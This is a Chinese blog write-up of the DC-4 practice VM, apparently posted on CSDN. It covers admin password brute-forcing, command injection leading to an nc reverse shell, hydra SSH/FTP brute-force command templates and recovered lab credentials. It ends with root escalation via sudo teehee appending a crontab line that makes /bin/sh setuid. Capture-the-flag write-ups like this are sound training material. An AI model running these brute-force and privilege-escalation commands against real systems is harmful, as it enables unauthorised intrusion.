dc4靶机实战记录thee追加提权

 

 欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注

 

一、外网打点

80端口和22端口

22 hydra爆破不出来,80,sql注入扫不出来。直接爆破admin

账号admin

密码happy

进去之后发现命令执行:

能列出文件 ,ls。所以, bp抓包试试改命令。

nc反弹shell

交互式:

python -c 'import pty;pty.spawn("/bin/sh")'

二、后渗透

在用户jim目录下发现一个old password 文件:

生成密码,爆破ssh用户,猜测本机还有什么用户。

破解ssh: 

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 

破解ftp: 

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 

爆破ssh

得到ssh结果是:

jim   jibril04

登录看到有邮件,可能是邮件里面有洞

 全机搜索mail,发现有

/var/mail/jim

于是看看,发现

切换到查理斯,一个一个提权方法试着,发现还是sudo -l最香的root:

以root执行的teehee命令,而teehee的作用是可以向文件中追加内容

想起了第一个靶机的手段,追加etc/passwd。但是需要etc有写权限,ls -al查看还真有:

那就:大佬的图

 计划任务也行其实:

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

 之后能拿到root

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值